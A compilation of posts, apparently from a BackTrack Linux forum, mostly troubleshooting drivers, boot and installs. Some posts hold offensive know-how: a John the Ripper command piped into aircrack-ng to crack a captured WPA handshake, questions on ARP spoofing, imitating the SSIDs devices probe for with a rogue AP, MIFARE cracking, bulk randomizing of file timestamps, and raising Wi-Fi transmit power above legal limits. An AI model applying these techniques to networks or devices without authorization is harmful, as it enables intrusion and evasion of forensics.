openjdk-6-jre-lib, openjdk-6-jre, openjdk-6-jdk, php5, python-distutils-extra, python-libxml2, unattended-upgrades, python-software-properties, python3.1, python3.1-minimal, ri1.8, rdoc1.8, software-properties-kde, sudo, xsltproc
-
HI all,
I'm using Back Track for while ( 2 years ), I'm using aircrack, pyrit, and crunch for cracking wpa captures files, but when I tried to use hashcat and hashcat-plus it dose not work, it seems that I have no graphical drivers installed on my laptop.
My question is:
What driver I should install? my laptop is TOSHIBA M700 with 3 giga of RAM and Intel chipset, and can I use hashcat-plus with out just cpu prossessor?
-
-
Hello,
I installed BT5 in 64-bit Samsung laptop (along with Win7 in other partition).
However, after completing the installation, the very first time I tried using wicd, I got
Code:
could not connect to wicd's d-bus interface
Next I tried these and restarted my laptop,
Code:
# dpkg-reconfigure wicd
# update-rc.d wicd defaults
After restarting, the error did not appear. However, wicd showed me the message "No Wireless networks found".
No matter, what I do (refreshing, restarting) it remains same.
I also tried checking a few more things. Assuming that those info may be useful for you guys to help me out, I am posting those below:
Code:
# lspci -v | grep -i "Network"
01:00.0 Network controller: Intel Corporation Device 088e (rev 24)
# iwconfig
lo no wireless extensions.
wlan0
IEEE 802.11abgn ESSID:off/any
Mode: Managed Access Point: Not-Associated Tx-Power= 0 dBm
Retry long limit: 7 RTS: Off Fragment thr: off
Encryption Key: off
Power Management:off
eth0
no wireless extensions.
# ethtool -i wlan0
driver: iwlwifi
version: 3.2.6
firmware-version: 17.168.5.1 build 33993
bus-info: 0000:01:00.0
#
Thanks guys
-
hi, all.
i know the purpose of this script is trivial, but i got bored one day and thought i'd redo my 5-liner script with a more user-friendly one to share here. (actually, i was trying to think of something to contribute to the forum, no matter how lame, hehe).
anyway, the turbo-TX.sh script is a quick way to increase the TX power of your 1-Watt wifi card (i tested this only with AWUS036H) from its default 10dBm (100mW) setting to 27dBm (500mW) or 30dBm (1W), or revert back to default.
download the file and set the correct permissions:
Code:
root@bt:~# wget http://dl.dropbox.com/u/48520533/turbo-TX.sh
root@bt:~# chmod 744 turbo-TX.sh
USAGE:
Code:
root@bt:~# ./turbo-TX.sh [wifi interface] [MAX|MID|NORM]
root@bt:~# ./turbo-TX.sh noob
root@bt:~# ./turbo-TX.sh
EXAMPLES:
To set TX power to 30dBm for wlan0:
Code:
root@bt:~# ./turbo-TX.sh wlan0 MAX
To use the wizard setup, a-la dummy style:
Code:
root@bt:~# ./turbo-TX.sh noob
If you want to run this when BT5 starts, use the custom setting (initially set in the script to 30dBm) and run the script without any options:
Code:
root@bt:~# ln -s turbo-TX.sh /etc/init.d/
root@bt:~# update-rc.d -f turbo-TX.sh defaults
CAUTION: I've read that some countries implement a strict rule against increasing the TX power of your card beyond their prescribed limit. So, use this script with caution. Personally, i don't know authorities will be able to catch you with this silly rule. But, just the same, don't say i didn't warn you ;)
stay secure.
-
Hello!
First, I don't write English so good, so excuse me for any issue.
I have a trouble with the nvidia driver, I downloaded nvidia-linux-bla-bla.run from the nvidia web page, set the permission to the archive, log out and type "sh ./ nvidia-linux-bla-bla.run" and the driver works perfect, the problem is when I install/unistall any package or software, I got this message:
Quote:
Setting up nvidia-173 (173.14.22-0ubuntu11) ...
update-alternatives: warning: forcing reinstallation of alternative /usr/lib/nvidia-current/ld.so.conf because link group gl_conf is broken.
update-alternatives: warning: skip creation of /usr/lib/libvdpau_nvidia.so because associated file /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so (of link group gl_conf) doesn't exist.
update-alternatives: warning: skip creation of /usr/lib/vdpau/libvdpau_nvidia.so.1 because associated file /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so.1 (of link group gl_conf) doesn't exist.
update-alternatives: warning: skip creation of /usr/lib32/vdpau/libvdpau_nvidia.so.1 because associated file /usr/lib32/nvidia-current/vdpau/libvdpau_nvidia.so.1 (of link group gl_conf) doesn't exist.
update-alternatives: warning: skip creation of /usr/lib32/libvdpau_nvidia.so because associated file /usr/lib32/nvidia-current/vdpau/libvdpau_nvidia.so (of link group gl_conf) doesn't exist.
update-alternatives: warning: skip creation of /usr/lib/xorg/modules/drivers/nvidia_drv.so because associated file /usr/lib/nvidia-current/xorg/nvidia_drv.so (of link group gl_conf) doesn't exist.
Removing old nvidia-173-173.14.22 DKMS files...
------------------------------
Deleting module version: 173.14.22
completely from the DKMS tree.
------------------------------
Done.
Loading new nvidia-173-173.14.22 DKMS files...
First Installation: checking all kernels...
Building only for 2.6.38
Building for architecture i686
Building initial module for 2.6.38
Error! Bad return status for module build on kernel: 2.6.38 (i686)
Consult the make.log in the build directory
/var/lib/dkms/nvidia-173/173.14.22/build/ for more information.
dpkg: error processing nvidia-173 (--configure):
subprocess installed post-installation script returned error exit status 10
Processing triggers for python-gmenu ...
Rebuilding /usr/share/applications/desktop.en_US.UTF8.cache...
Processing triggers for python-support ...
Errors were encountered while processing:
nvidia-173
Setting up nvidia-173 (173.14.22-0ubuntu11) ...
Removing old nvidia-173-173.14.22 DKMS files...
------------------------------
Deleting module version: 173.14.22
completely from the DKMS tree.
------------------------------
Done.
Loading new nvidia-173-173.14.22 DKMS files...
First Installation: checking all kernels...
Building only for 2.6.38
Building for architecture i686
Building initial module for 2.6.38
Error! Bad return status for module build on kernel: 2.6.38 (i686)
Consult the make.log in the build directory
/var/lib/dkms/nvidia-173/173.14.22/build/ for more information.
dpkg: error processing nvidia-173 (--configure):
subprocess installed post-installation script returned error exit status 10
Processing triggers for python-gmenu ...
Rebuilding /usr/share/applications/desktop.en_US.UTF8.cache...
Processing triggers for python-support ...
when I reboot the computer, I can't star with "startx" and give me the error "screens not found" and I need to reinstall the driver.
Thanks for your help!
-
Hello all,
I am having an issue installing x64 BT5R3 with Gnome on my laptop. I have done this install before without issue so maybe I am overlooking something. I am following
this guide. My issue is with creating the first partition:
Code:
root@bt:~# fdisk /dev/sda
WARNING: DOS-compatible mode is deprecated. It's strongly recommended to
switch off the mode (command 'c') and change display units to
sectors (command 'u').
Command (m for help): d
Partition number (1-5): 1
Command (m for help): n
Command action
l logical (5 or over)
p primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-30401, default 1):
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-65, default 65):
Why, after selecting the first cylinder as the starting point, does the number of cylinders drop to 65 from 30401?
-
Hi All,
Anyone had any luck getting CUDA + Pyrit working on a GTX 670 under BT5R3?
I recently upgraded my GPU from a GTX 260 and thought I would try and follow my old post about how I got that working:
http://www.backtrack-linux.org/forum...ad.php?t=48510
No dice! I get weird artifacts all over the screen and keep hitting about 28,000 PMK/s before it crashes after about 20 seconds. (I am not even logging into xserver to run the test).
It gives the following error (please excuse my typing - I am copying from a photo!)
***
[18700.122794] NVRM Xid (0000:01:00): 13, 0001 00000000 0000a0c0 000002bc 00000003 00000000
Exception in thread CUDA-Device #1 'Geforce GTX 670':
Traceback (most recent call last):
File "/usr/lib/python2.6/threading.py", line 532, in _bootstrap_inner self.run()
File "/usr/local/lib/python2.6/dist-packages/cpyrit/cpyrit.py", line 116, in run res = self.solve(esid, pwlist0
SystemError: CUDA_ERROR_LAUNCH_FAILED
Exception in thread CPU-Core (SSE2):
Traceback (most recent call last):
File "/usr/lib/python2.6/threading.py", line 532, in _bootstrap_inner self.run()
File "/usr/local/lib/python2.6/dist-packages/cpyrit/cpyrit.py", line 110, in run essid, pwlist = self.queue.gather(self.buffersize, timeout=0.5)
File "/usr/local/lib/python2.6/dist-packages/cpyrit/cpyrit.py", line 632, in _gather self._check_cores()
File "/usr/local/lib/python2.6/dit-packages/cpyrit/cpyrit.py", line 490, in _check_cores raise SystemError("The core '%s' has died unexpectedly" % core)
SystemError: the core 'CUDA-Device #1 'Geforce GTX 670'' has died unexpectedly
Traceback (most recent call last):
File "/usr/local/bin/pyrit", line 6, in <module>
pyrit_cli.Pyrit_CLI().initFromArgv()
File "/usr/local/lib/python2.6/dist-packages/pyrit_cli.py", line 117, in initFromArgv func(self, **options)
File "/usr/local/lib/python2.6/dist-packages/pyrit_cli.py", line 1213, in benchmark for r in cp:
File "/usr/local/lib/python2.6/dist-packages/cpyrit/cpyrit.py", line 507, in _iter_ r = self.dequeue(block=True)
File "/usr/local/lib/python2.6/dist-packages/cpyrit/cpyrit.py", line591, in dequeue self._check_cores()
File "/usr/local/lib/pyhton2.6/dist-packages/cpyrit/cpyrit.py", line 490, in _check_cores raise SystemError: The core 'CUDA-Device #1 'GEFORCE gtx 670'' has died unexpectedly
***
I am no coder, and the original guide I wrote was a hotch-potch of other people's work. I am out of my depth with this error.
I am using the production release of CUDA (5.0.35) for Ubuntu 10.04 from the NVIDIA website. I have tried with the graphic driver bundled with CUDA 5.0.35 as well as the latest driver from NVIDIA (310.19). I am using the latest version of pyrit (0.4.1-dev (svn 308)) and have made sure that I am running pure Ubuntu 10.04 by blocking dist upgrades in kpackagekit.
I have tried the Backtrack wiki solution:
http://www.backtrack-linux.org/wiki/...A_On_Backtrack
but the CUDA 4 drivers do not appear to be compatible with the GTX 670 and won't install.
I have tried both 64 and 32 bit versions/re-installs to no avail. I have also tried installing CUDA to default directories as well as /opt/
Any help greatly appreciated.
EDIT: I should add this in NOT a Sandy Bridge and there is no onboard graphics to confuse things. Its on a Phenom II.
I noticed that on attempting again, it could be an issue with building cuda for pyrit ie..
running build
running build_ext
Skipping rebuild of Nvidia CUDA kernel
Building modules....
Going to try it in Maya and see if it works...
-
Hi, i loved the Backtrack 5 R3, after test many linux distros, this one i had a crash on it.
All running fine, except sound and brightness button from keyboard.
I need help to make this sound card work:
Code:
lspci -vvs 00:1b.0
00:1b.0 Audio device: Intel Corporation Panther Point High Definition Audio Controller (rev 04)
Subsystem: Acer Incorporated [ALI] Device 072d
Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Latency: 0, Cache Line Size: 64 bytes
Interrupt: pin A routed to IRQ 10
Region 0: Memory at f0710000 (64-bit, non-prefetchable) [size=16K]
Capabilities: [50] Power Management version 2
Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0+,D1-,D2-,D3hot+,D3cold+)
Status: D0 PME-Enable- DSel=0 DScale=0 PME-
Capabilities: [60] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable-
Address: 0000000000000000 Data: 0000
Capabilities: [70] Express (v1) Root Complex Integrated Endpoint, MSI 00
DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s <64ns, L1 <1us
ExtTag- RBE- FLReset+
DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported-
RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+
MaxPayload 128 bytes, MaxReadReq 128 bytes
DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr+ TransPend-
LnkCap: Port #0, Speed unknown, Width x0, ASPM unknown, Latency L0 <64ns, L1 <1us
ClockPM- Suprise- LLActRep- BwNot-
LnkCtl: ASPM Disabled; Disabled- Retrain- CommClk-
ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt-
LnkSta: Speed unknown, Width x0, TrErr- Train- SlotClk- DLActive- BWMgmt- ABWMgmt-
Capabilities: [100] Virtual Channel <?>
Capabilities: [130] Root Complex Link <?>
Kernel modules: snd-hda-intel
Code:
modprobe snd_hda_intel
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
FATAL: Error inserting snd (/lib/modules/3.2.6/kernel/sound/acore/snd.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error running install command for snd
WARNING: Error inserting snd_pcm (/lib/modules/3.2.6/kernel/sound/acore/snd-pcm.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error inserting snd_hwdep (/lib/modules/3.2.6/kernel/sound/acore/snd-hwdep.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error inserting snd_hda_codec (/lib/modules/3.2.6/kernel/sound/pci/hda/snd-hda-codec.ko): Unknown symbol in module, or unknown parameter (see dmesg)
FATAL: Error inserting snd_hda_intel (/lib/modules/3.2.6/kernel/sound/pci/hda/snd-hda-intel.ko): Unknown symbol in module, or unknown parameter (see dmesg)
Code:
lsmod | grep -i snd
snd_page_alloc 18101 0
Code:
cat /proc/asound/card0/codec* | grep Codec
cat: /proc/asound/card0/codec*: Arquivo ou diretório não encontrado
I tried to install this alsa-driver-1.0.25
with this tutorial
http://www.alsa-project.org/main/ind...dule-hda-intel
but when i load the command
modprobe snd-hda-intel ; modprobe snd-pcm-oss ; modprobe snd-mixer-oss ; modprobe snd-seq-oss
Code:
modprobe snd-hda-intel ; modprobe snd-pcm-oss ; modprobe snd-mixer-oss ; modprobe snd-seq-oss
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
FATAL: Error inserting snd (/lib/modules/3.2.6/kernel/sound/acore/snd.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error running install command for snd
WARNING: Error inserting snd_pcm (/lib/modules/3.2.6/kernel/sound/acore/snd-pcm.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error inserting snd_hwdep (/lib/modules/3.2.6/kernel/sound/acore/snd-hwdep.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error inserting snd_hda_codec (/lib/modules/3.2.6/kernel/sound/pci/hda/snd-hda-codec.ko): Unknown symbol in module, or unknown parameter (see dmesg)
FATAL: Error inserting snd_hda_intel (/lib/modules/3.2.6/kernel/sound/pci/hda/snd-hda-intel.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
FATAL: Error inserting snd (/lib/modules/3.2.6/kernel/sound/acore/snd.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error running install command for snd
WARNING: Error inserting snd_page_alloc (/lib/modules/3.2.6/kernel/sound/acore/snd-page-alloc.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error inserting snd_timer (/lib/modules/3.2.6/kernel/sound/acore/snd-timer.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error inserting snd_pcm (/lib/modules/3.2.6/kernel/sound/acore/snd-pcm.ko): Unknown symbol in module, or unknown parameter (see dmesg)
FATAL: Error inserting snd_pcm_oss (/lib/modules/3.2.6/kernel/sound/acore/oss/snd-pcm-oss.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
FATAL: Error inserting snd (/lib/modules/3.2.6/kernel/sound/acore/snd.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error running install command for snd
FATAL: Error inserting snd_mixer_oss (/lib/modules/3.2.6/kernel/sound/acore/oss/snd-mixer-oss.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
WARNING: All config files need .conf: /etc/modprobe.d/alsa-base, it will be ignored in a future release.
WARNING: /etc/modprobe.d/alsa-base line 2: ignoring bad line starting with 'sudo'
FATAL: Error inserting snd (/lib/modules/3.2.6/kernel/sound/acore/snd.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error running install command for snd
WARNING: Error inserting snd_timer (/lib/modules/3.2.6/kernel/sound/acore/snd-timer.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error inserting snd_seq (/lib/modules/3.2.6/kernel/sound/acore/seq/snd-seq.ko): Unknown symbol in module, or unknown parameter (see dmesg)
WARNING: Error inserting snd_seq_midi_event (/lib/modules/3.2.6/kernel/sound/acore/seq/snd-seq-midi-event.ko): Unknown symbol in module, or unknown parameter (see dmesg)
FATAL: Error inserting snd_seq_oss (/lib/modules/3.2.6/kernel/sound/acore/seq/oss/snd-seq-oss.ko): Unknown symbol in module, or unknown parameter (see dmesg)
I apreciate Help, Thanks! :cool:
-
-
1) Most importantly, will I be able install it to the harddisk?
2) The best info I got from googling for the wireless chipset was that it is using the AzureWave AW-NE785H from
http://blog.gambliser.com/2012/05/ee...ndows-7-32bit/, and that it is using the atheros chipset from wikidevi.com/wiki/AzureWave_AW-NE785H, can anyone confirm the chipset and if packet injection is working on the machine?
Pardon me for being a noob, any help would be very appreciated.
Specifications:
Display 11.6" LED Backlight WXGA (1366x768) Screen
CPU AMD® Fusion APU E450 1.65GHz (dual core)/C60 1.0GHz (dual core) Processor *2
Graphic AMD® Radeon HD 6320/AMD® Radeon HD 6290*2
Memory DDR3, 1 x On Board Memory, 2GB/4GB *4
Storage 320GB/500GB/750GB HDD
3GB ASUS Web Storage*5
Wireless Data Network WLAN 802.11 b/g/n@2.4GHz
Bluetooth V3.0+HS(Optional)
Camera 0.3 MP Camera
Audio Hi-Definition Audio CODEC
Stereo Speakers
High Quality Mic
Interface 1 x VGA Connector
1 x USB 2.0 *3
2 x USB 3.0 *3
1 x LAN RJ-45
1 x HDMI
2 x Audio Jack (Headphone/Mic-In)
1 x Card Reader : SD/ SDHC/ SDXC/ MMC
URL:
http://sg.asus.com/Eee/Eee_PC/Eee_PC...specifications
-
Im trying to experience with Backtrack in a virtual machine on my macbook air.
I setuo the network device to be bridged so that the vm will have my true internal ip in the network
i also setup the vm to have my true mac address.
then, i started arpspoof but once i do it (or ettercap, tried that too) i lose internet connectivity.
the idea works, the victim target sees my mac address as the router's mac address.
but why do i lose internet connection?
-
I followed
this guide to installing x64 bt5r3 encrypted and everything worked fine, then one day I booted and received the error "/dev/mapper/vg-root does not exist! Dropping to shell!"
I followed the troubleshooting steps at the end of the install guide to no avail. I have googled the issue and followed
this guys suggestions as well which have not worked. Would this be because my drive is encrypted?
I have googled a number of miscellaneous ideas that came to mind and followed some shot-in-the-dark suggestions to no avail. Perhaps (hopefully) I am overlooking something simple.
Can anyone point me in the right direction or suggest some things I should look in to?
-
Hello, This is my first post to the BT forums. A little background first; I am into network administration as a course of study and I have Linux experience at the college level. That said, I will mention the unmentionable trove of M$ exp as well. I love hacking. I have been poking around BT for a quite awhile, played with it before college even, broke some WEP, WooHoo.
During my education I learned about proper documentation. I already knew how to be helpful and I endeavor to be a nice guy. The level of flames and irrelevant posts in this forum and BT material around the internet generally is appalling. The gross lack of respect that I have witnessed is reproachable. The organization (at the internet level) sucks. I have never participated in an environment as scattered as this. I WASTE time wading through all of this crap. I don't want to keep blowing time parsing cruft. Is there somewhere else!? hehe.
I notice that a lot of the commands that I learned in the CentOS style Bash are irrelevant here. Is there a concise list concerning this OS's syntax? It is irritating when makewhatis turns into mandb -c GRRRRR!!!!!! I understand that BT subjects are offered as courses. Do I really need to blow another 6 grand? or 30? or 40? Whatever it may be, I have already buried a lot into my IT addiction. Is that how it is? I hope not. The courses are expensive for a week of training IMHO, or I would already be there.
There are certain things that I think the community should think about. One really stupid thing , IMHO, is the fact that a stock BT5 r3 can't take a screen shot. I know linux is the configuration wizard's dream but really!? I have to grab software to make a screen shot in a distro as maniacally fleshed out as this!? I swore and swore I did.
So anyhow, I'll hang out. I'm looking for some new comrades. I have some really cool comrades as well, great people, great hackers, not much trouble. Can't wait to hear from the community with some road signs showing the way...
daed lanth
gmail
-
I'm having trouble with extremely large network scans and was wondering if anyone else was having issues. Trying to scan 16 Class Bs (yes, that's crazy but the company's IP schema is set up poorly) and it blows up all GUI versions of nmap but command line doesn't work much better. It can't seem to read from the list. I'm using 'nmap -iL - iplist.txt -PR -O -oX test.xml'
My goal is that it reads from the list, does a name resolution, OS identify, and outputs xml to a file. It seems to have major problems reading from the file AND when it errors out it prints my format back as 'nmap -O -oX -PR -test.xml iplist.txt'
Any thoughts or suggestions?
-
I have been having issues searching for information about this topic mainly because I cannot think of the proper vocabulary and/or terminology associated with it.
I am trying to find information concerning whether or not it is possible to determine what networks are being sought by wireless devices.
For example: A smartphone or laptop has a list of SSIDs that it has saved for itself, so that when the network comes within range it will automatically connect. From what I understand, there are two methods by which the laptop will know if it is able to connect.
A: The network itself is broadcasting its SSID and such (most common case I think)
B: The network has a hidden SSID or the laptop itself might wish to ping its surrounding networks to determine their identities and decide if it should connect.
I would like to be able to detect which SSIDs (and other connection information) the laptop is looking for, and ultimately be able to replicate the network broadcast using a tool such as Rogue AP or something.
What I really would like to know is if terminology exists for such this idea, because I have had a very hard time finding any information at all concerning this topic, so I feel like I'm missing something. Any help/info about this topic would be much appreciated!
-
Hi.. i have a partition set up on my hard drive that i want to boot the live iso image from, the image i want to boot is BACKTRACK5r2-kde 32bit. i have many reasons for wanting to do this one is a live OS is supposed to boot much faster this way,and no need for CD, DVD, or USB. i already have it on USB, and i also have a virtual-box install. so this is one more method i want to add to my arsenal.
So here is the grub configuration i have set up for BACKTRACK5 and the errors i receive.
menuentry "BackTrack5-r2-32bit KDE" {
set root='(hd0,msdos4)'
search --no-floppy --fs-uuid --set 8EE9-EF34
loopback loop /BT5R2-KDE-32.iso
linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=/BT5R2-KDE-32.iso quiet splash locale=en_US bootkbd=us console-setup/layoutcode=us user-setup/encrypt-home=true noeject --
initrd (loop)/casper/initrd.gz
}
so when i chose that boot option on my grub menu the error i get is no argument specified. press any key to continue then when i hit a key i get a momentary blinking cursor and then it goes to a ubuntu place holder for ubuntu 10.04? if i hit F1 it goes to the (initramfs) prompt and i get the following message over and over
/init: line3: cant open /dev/sr0: no medium found
stdin: error0
it cycles through that a million and a half times and then it goes to this
(INITRAMFS) unable to find a medium containing a live file system press any key to continue
what gives folks any ideas? this would be a fabulous way to boot BACKTRACK in my opinion for a multitude of reasons. any help would be apreciated thanks/////
-
I'm new to linux in general so sorry if I sound stupid. I've been trying to use mfcuk (
http://code.google.com/p/mfcuk/) with a SCL3711 contact-less reader.
I've google and browsed through countless forums and finally got the reader to actually read, but when I try to make mfcuk I get
Quote:
null@livingroom-pc:~/mfcuk-read-only# make
make all-recursive
make[1]: Entering directory `/root/mfcuk-read-only'
Making all in src
make[2]: Entering directory `/root/mfcuk-read-only/src'
CC crapto1.o
In file included from crapto1.c:20:
crapto1.h: In function parity:
crapto1.h:69: warning: implicit declaration of function asm
crapto1.h:75: error: expected ) before : token
make[2]: *** [crapto1.o] Error 1
make[2]: Leaving directory `/root/mfcuk-read-only/src'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/root/mfcuk-read-only'
make: *** [all] Error 2
I've tried with different versions of libnfc, and have been at it for a few days. Sorry if this s an easy problem to solve..
I'm using Backtrack 5 r3 btw, I'm not sure what other information is needed but can provide.
-
I am interested in doing some static analysis on a PHP codebase to detect security issues beyond greping every $_POST, $_REQUEST etc and manually checking to see that they are handled properly.
Any stock BT5 tools to do this and if not any tool recommendations?
-
Greetings all.
I would just like to open with a thank you to all contributors on this board. I obviously have not been registered very long, but I have been using the resources here for sometime.
I am using BT 5 R2 Gnome 64-bit booting from a live cd.
I was able to get JtR to run in incremental mode and I was also able to get it piped into aircrack-ng ... After about 10 hours aircrack shutdown and stated the password was not found. I did some research and obviously figured out that incremental mode has a max. of 8 characters. I went into John.conf and changed the values the section;
# Incremental Mode
[Incremental:All]
File=$JOHN/all.char
MinLen=8 <b>(it was set to 0)</b>
MaxLen=20 <b>(it was set to 8)</b>
After doing that I ran this command;
John --incremental:ALL --stdout | aircrack-ng -b 00:00:00:00:00:00 -w - wifihandshake.cap
Then it acted as if aircrack was going to open but instead displayed;
Quitting aircrack-ng...
My question is what did I do wrong? I know there are lots of topics on JtR piping issues, but none of the ones I have found really break it down.
My second question is; Does JtR use both CAPs and lowercase letters when running incremental mode? I know most routers these days are case sensitive.
And my question is; id JtR does not run through both lower and uppercase letters for this type of process, then I would like to define my own custom character set or edit and existing character set to gear it more towards wpa/wpa2 cracking... where might I find a decent tutorial that explains that? I have found lots of info on this, but nothing that is a step by step breakdown.
Anyways pardon my newbism and thank you in advance for any help you may provide.
-
-
Hi all frinds i create a pppoeconf connetion and install networ-manager-gnome but i have a problem with nm-applet when i run this command in finally for creat vpn nm-applet &
i get this error
Code:
root@bt:~# nm-applet &
[1] 1710
root@bt:~# An instance of nm-applet is already running.
** (nm-applet:1710): WARNING **: <WARN> constructor(): Couldn't initialize the D-Bus manager.
anyone can help me for solve this problem sory for my bad english
Code:
apt-get install network-manager-gnome
cp /etc/network/interfaces{,.backup}
echo ""auto lo"" > /etc/network/interfaces
echo ""iface lo inet loopback"" >> /etc/network/interfaces
service network-manager start
nm-applet &
thanks in advance
-
Hello all.
I'm setting up a home network to do some penetration testing. I'm going to school for Info sec and wanted to get some hands on experience with some of the awesome tools in BT (legally too! :)).
I found a peach of a XPS for my pen testing computer (desktop). I took out the hard drive, wiped it and reformatted it under ext3.
I put Backtrack 5 Gnome on a USB. It booted from USB just fine. I installed it, and it seemed to go ok, but the problem I'm having is that when restarting it, the GRUB loader won't come up. It just sits there, doing nothing. I went back into install and confirmed that it did install it on the disk.
I'm a novice at Linux but am slowly self teaching myself, hence the operator error issue here. Is there any way I can run a shell from the USB to install or update GRUB on the HD? Or am I missing something critical?
I hope I put enough information in here. If not let me know.
Thank you so much for your time.
v/r,
Dylan
***EDIT - After doing some further research I realize now it's the MBR - it doesn't exist...Trying to figure out how to reinstall / repair it from USB shell commands...
-
I wanted load BeEF plugins in metasploit,But I get wrond message
图像 1.jpg
How to solve this problem.
and I already execute "gem install hpricot:mad"
:mad:
Immagini allegate
-
A good day to everyone on the BT forums.
I signed up specifically to ask this question. I am looking for a good wireless card that supports all the great features BT has. The chip I'm looking for must be available in a PCI-E format and I would like it to be compatible with A/B/G/N. I have been looking around a bit and found the AR5008E-3NX that will fit into my laptop and supports packet injection but this chip seems to be rather old and slow and I was hoping that some of you could give me advice on maybe buying a more recent chip. If this card is the best I can get please let me know as well.
Thanks very much,
Hans
-
I'm running a MacBook Pro (more specifics below). I've installed my own SSD in the main bay and replaced the "Superdrive" (DVD drive) with the original HDD to give me a combination of speed and storage capacity. Operating systems: OSX 10.8.2 on SSD and Windows 7 Professional as a partition on the HDD, installed with Boot Camp. I use an external USB DVD drive as the HDD is where the built-in drive would go(details below). I'm not sure what else you need to know, and I will happily provide more info if you need it.
Several days ago, I downloaded BackTrack 5 R3 (64 bit) and burned the iso to a DVD. After testing for a while on the family iMac, I decided to install it on my MBP. However, when I start the computer using the BT5 DVD, it immediately hangs. Here's what happens: I boot the computer holding the option key to select which operating system I want to use. After the DVD drive spins up, BT5 appears and I select it. The screen goes black for a while and then I am prompted with Boot:_ I press return to select the default boot option and the underscore goes to the next line and continues flashing. After this, the access light on my DVD drive stays off and my laptop begins to increase its fan speed. I've waited with the laptop like this for 30 minutes or so, no changes. Any ideas of what to do? My best guess is that my external drive isn't supported by the drivers, like the graphics on the iMac. (Fixed using xforcevesa.) Two days worth of Google searches have turned up nothing, but its quite possible I missed a solution. A verbose mode could be helpful, if there is any available so early in the boot process.
Model Name: MacBook Pro
Model Identifier: MacBookPro8,2
Processor Name: Intel Core i7
Processor Speed: 2.4 GHz
Number of Processors: 1
Total Number of Cores: 4
L2 Cache (per Core): 256 KB
L3 Cache: 6 MB
Memory: 4 GB
Boot ROM Version: MBP81.0047.B27
SMC Version (system): 1.69f3
hp BD-ROM BDCTD03HA:
Firmware Revision: 1.00
Interconnect: USB
Burn Support: Yes (Generic Drive Support)
Profile Path: None
Cache: 4000 KB
Reads DVD: Yes
CD-Write: -R, -RW
DVD-Write: -R, -R DL, -RAM, -RW, +R, +R DL, +RW
Write Strategies: CD-TAO, CD-SAO, CD-Raw, DVD-DAO
-
-
Anyone know of a windows tool that can change timestamps on bulk files randomly? I have a directory of about 100 files that I need to generate random files time stamps and don't want to do it manually with timestomp.exe
thx
-
Hi,
I'm trying to install bt5 r3 on my notebook Satellite C660-11V Intel-Core i3-370M 2.4GHz 3072MB 320GB DVDRW 15.6'' LED WXGA FreeDOS Intel GMA HD VGA, chip set is Intel HM55.
I'm stuck in step where I'm typing startx, after running this command nothing happen only blackscreen and lighting capslooks.
I see the next message: "system information disabled due to load higher than 4.0"
When I try to install on VM I install without any problem.
Can you help me about this ?
Thanks in Advance
-
Hi all!
Does anyone recognize the problem I have installing Xeoma_linux on BT5?
After unpacking xeoma_linux.tgz and running the included Xeoma.app I get the following message: "!! Run Xeoma without ROOT privileges! !!"
I tried creating a non-root user and running the program again, which gets me a little further, but somewhere along the process I get another error message. Can't remember what is said exactly, but it had something to do with not being able to write to a certain directory. Anyway, I'm at a loss.
Could someone try for me to get it running, and tell me how it's done?
Cheerio!
Mickey
-
Hi Guys,
